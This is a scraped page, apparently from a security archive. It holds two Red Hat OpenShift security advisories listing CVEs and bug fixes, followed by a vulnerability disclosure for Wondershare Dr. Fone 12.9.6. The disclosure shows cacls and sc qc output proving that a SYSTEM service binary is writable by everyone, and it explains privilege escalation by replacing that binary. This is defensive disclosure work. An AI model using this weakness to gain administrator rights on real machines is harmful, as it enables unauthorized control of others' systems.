F4eNf+h/Rkj4dfPTaCInxd/jrGrJgT/H2Q6+A9W6GxVGZgIwh1GRddmRA8/sTESR  
5ld/uCluldZd9eVtLg196QB4lWaYi0Xiw0Up3+rMSFDeQCglbRHsn4EBsfixq/Nq  
2tnyL7Vee+tZsLzhozc9aLsc51AvOib1X0cLsqVnrRhK2mnGIgJoZQByM1KZzK+x  
pl9EVqvBeJI=  
=uOYv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0932-01

Red Hat Security Advisory 2023-1170-01 - Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Data Foundation. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift Data Foundation 4.12.1 security bug fix update  
Advisory ID:       RHSA-2023:1170-01  
Product:           RHODF  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1170  
Issue date:        2023-03-08  
CVE Names:         CVE-2020-10735 CVE-2021-4238 CVE-2021-28861   
                   CVE-2022-3650 CVE-2022-4415 CVE-2022-40897   
                   CVE-2022-45061 CVE-2022-47629   
=====================================================================

1. Summary:

Red Hat OpenShift Data Foundation 4.12.1 Bug Fix Update

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Data Foundation is software-defined storage integrated  
with and optimized for the Red Hat OpenShift Data Foundation. Red Hat  
OpenShift Data Foundation is a highly scalable, production-grade persistent  
storage for stateful applications running in the Red Hat OpenShift  
Container Platform. In addition to persistent storage, Red Hat OpenShift  
Data Foundation provisions a multicloud data management service with an S3  
compatible API.

Security Fix:

* goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as  
random as they should be (CVE-2021-4238)

For more details about the security issues, including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
pages listed in the References section.

Bug fixes:

* Previously, wrong and unclear error messages were displayed on  
Failover/Relocate modal. With this fix, appropriate error messages with  
links to documentation is added to most of the error messages. (BZ#2161903)

* With this update, the read operations performance of the Multicloud  
Object Gateway database is improved. To achieve this, a certain regular  
expressions that are used by some of the queries that run against the  
database to serve the required data are pre-compiled. This saves time when  
run in real-time. (BZ#2149861)

* Previously, the default container created in Azure was with public access  
enabled. With this fix, the default container created will not have the  
public access enabled which means `AllowBlobPublicAccess` is set to false.  
(BZ#2168838)

* With this update, the `multicluster-orchestrator` operator is listed  
under the operators supporting disconnected mode installations. To list  
this operator, the disconnected mode support annotation is added to CSV as  
the user interface (UI) uses this annotation. (BZ#2166223)

All users of Red Hat OpenShift Data Foundation are advised to upgrade to  
these updated images, which provide these bug fixes.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2123501 - [RDR] Pod stuck due to error "applyFSGroup failed for vol" for a PVC that was relocated  
2156729 - CVE-2021-4238 goutils: RandomAlphaNumeric and CryptoRandomAlphaNumeric are not as random as they should be  
2159466 - [MDR RDR] Application user unable to invoke Failover and Relocate actions  
2161652 - Namespace store fails to get created via the ODF UI  
2165493 - [MCG] Azure bs/ns creation fails with target bucket does not exists  
2165960 - [4.12.z clone] ocs-operator CSV is missing disconnected env annotation.  
2166220 - [RFE] ODF bluewash introduction in 4.12.x  
2166223 - CSV is missing disconnected env annotation and relatedImages spec  
2167301 - [RFE] ODF bluewash introduction in 4.12.x  
2167950 - CSV is missing disconnected env annotation and relatedImages spec  
2168637 - fix redirect link to operator details page (OCS dashboard)  
2170106 - Update to RHCS 5.3z1 Ceph container image at ODF-4.12.1  
2170449 - Include at ODF 4.12 container images the RHEL8 CVE fix on "libksba"

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-4238  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-3650  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAkjw9zjgjWX9erEAQhvEhAAjCAp2/GQUI0yUkWoltJ1BKFH9lyeceh3  
KuH5BTN/05smpatHAzv1FzQDXWDi5FdXw9F/EPGfKMK3V86LydVGMjg0OR+ay9NZ  
ffx9V8RMpyogLX6/P17xtthp+6JHNAZrkjDgNADByVOQppKqQulMIgzsT4BqvuR7  
kP/5PDmHdRv6667rTbJFnYJ/KbWq3Yw5yCfocuSViePFEBHcGKZhA39HSs4hWvVe  
C7jKaK46AIJ5+mEyHzXHIvjb1VnEYdCHrOrYTf6OIx+TXdGnWi5oOQEFrxe/s7D5  
G6mk/PAq42yNds/a7ZKg3kiDQhkjnL+2DejnIils2teLtGTSGSOsyv9qX3v0mAPP  
SM/18C6zH6J1ZjAEIB6byhsGKPbhyi2CybBvTkoylri5oEnD6UR6Z8tREGNusSB8  
aomD4SYAcLTZSE1/8pZzTvPmrsEc+fV8LztDYFOK9nm7BDvFPmtco4bpQPV2gT6H  
xSYmRMhj5aGkg5YxS08+EvfS78VQqzxV+Jx5Hr0nU1QT5cugTgr+RxfBPEVyyAU6  
yGg5+kqSa5jGxEJMlNt5NAAHckP7StDdPnye217S1b0P8oeY8EpYJ7xUjHmRuIHQ  
Vkhp5LMnZFIJwv+Nh9EywMfhB3I9acMAQvRutW+IlY6L6XqJtenqbuUoWA4MO5vV  
YImyLRk8vWk=  
=6IQw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1170-01

Red Hat Security Advisory 2023-0930-01 - Update information for Logging Subsystem 5.5.8 in Red Hat OpenShift. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Logging Subsystem 5.5.8 - Red Hat OpenShift  
Advisory ID:       RHSA-2023:0930-01  
Product:           Logging Subsystem for Red Hat OpenShift  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0930  
Issue date:        2023-03-08  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-2873   
                   CVE-2022-4415 CVE-2022-24999 CVE-2022-40897   
                   CVE-2022-41222 CVE-2022-41717 CVE-2022-43945   
                   CVE-2022-45061 CVE-2022-48303   
=====================================================================

1. Summary:

Logging Subsystem 5.5.8 - Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Logging Subsystem 5.5.8 - Red Hat OpenShift

Security Fix(es):

* express: "qs" prototype poisoning causes the hang of the node process  
(CVE-2022-24999)

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this errata update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

For Red Hat OpenShift Logging 5.5, see the following instructions to apply  
this update:

https://docs.openshift.com/container-platform/4.11/logging/cluster-logging-upgrading.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2150323 - CVE-2022-24999 express: "qs" prototype poisoning causes the hang of the node process  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-3630 - [release-5.5] Inconsistencies in vector normalization of systemd logs.

6. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-2873  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-24999  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41222  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-43945  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAkjvtzjgjWX9erEAQi6tg//cJalZDsvnICf9o4Rs1uZjds+wIMe9Ood  
26/ZK0dz+sr2c1zUrPZyRNSARa23TVNA4yN/rbO3qaTBUZg/3aYJrSMqCsNg+/FY  
O5gv4hlWNLkvS7/yiNvdOKTKVHpy9j0Kb4NEsI1X2pYZ/QOFd/U1lK4i9gUlIGIL  
DjDajvfMCQvzMwap+Y157aoWern+TwOhfr9xuMzGm4rFDRTG/AH4mORWwTnPln8C  
lzHpXCK95hDmHsgOBmTnqbbAZOjLDSydj4FaInLHBRK02cUZhskfFSFtuyUJ+2ee  
+4v/KbUQauqhJtQpj8aB9ERL/REafEqsxbEx6pBIBiHAtYFTksDumdMB8JWf7IwU  
DcDpOXZIYL9OkdjQNxZsRY9dmAf5J14DMhrEkPjwrcoqj2OGgaCVmUsZ7JE/dplT  
VwoUY8Nw9GlHgIDytG1/ddQv2pnvy91yl+MqeZzPID4aMjAreeZz4ESmGhuKdkNN  
0epd2nXVTZMi6JdUcRqJYhePEtnS8psEmaty+ofbEMdJ8dQX12bvcmPLzQkduN3+  
HsorF1V3PXaba/X1V6FHwu5UIxaHYqS37+RYMnZuvECJdJl8w6o1HrQSB9O+9ih8  
xkYncnuY+9xSksCpbPnQ+CFiv1PF4d+eH8MSN3AnHFGpFUujJRV8BR0QzhFPilDV  
Wi6FY+546Ow=  
=Ziq6  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0930-01

Wondershare Dr Fone version 12.9.6 suffers from a weak service permission vulnerability that can allow for privilege escalation.

Executive Summary:

Product Name: Wondershare Dr. Fone  
Vendor Home Page:  https://drfone.wondershare.com  
Affected Version(s): Dr Fone version 12.9.6  
Vulnerability Type: Execution with Unnecessary Privileges (CWE-250)  
CVE Reference: CVE-2023-27010.  
Credit: Thurein Soe

Vendor Description:

Wondershare Dr. Fone is an app designed to help with data recovery and  
management for all Android and iOS devices.

Vulnerability description:

Wondershare Dr Fone version 12.9.6 running services named "WsDrvInst" on  
Windows have weak service permissions and are susceptible to local  
privilege escalation vulnerability. Weak service permissions run with  
system user permission, allowing a standard user/domain user to elevate to  
administrator privilege upon successfully modifying the service or  
replacing the affected executable. DriverInstall.exe gave modification  
permission to any authenticated users in the windows operating system,  
allowing standard users to modify the service and leading to Privilege  
Escalation.

C:\Users\NyaMeeEain\Desktop>cacls "C:\Program Files  
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"  
C:\Program Files (x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe  
 Everyone:(ID)F

NT AUTHORITY\SYSTEM:(ID)F

BUILTIN\Administrators:(ID)F

BUILTIN\Users:(ID)R

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R

APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R  
C:\Users\NyaMeeEain\Desktop>sc qc WsDrvInst  
SERVICE_NAME: WsDrvInst  
        TYPE               : 10  WIN32_OWN_PROCESS  
        START_TYPE         : 3   DEMAND_START  
        ERROR_CONTROL      : 1   NORMAL  
        BINARY_PATH_NAME   : "C:\Program Files  
(x86)\Wondershare\drfone\Addins\Repair\DriverInstall.exe"  
        LOAD_ORDER_GROUP   :  
        TAG                : 0  
        DISPLAY_NAME       : Wondershare Driver Install Service  
        DEPENDENCIES       : RPCSS  
        SERVICE_START_NAME : LocalSystem

References:  
https://cwe.mitre.org/data/definitions/250.html

Source

Packet Storm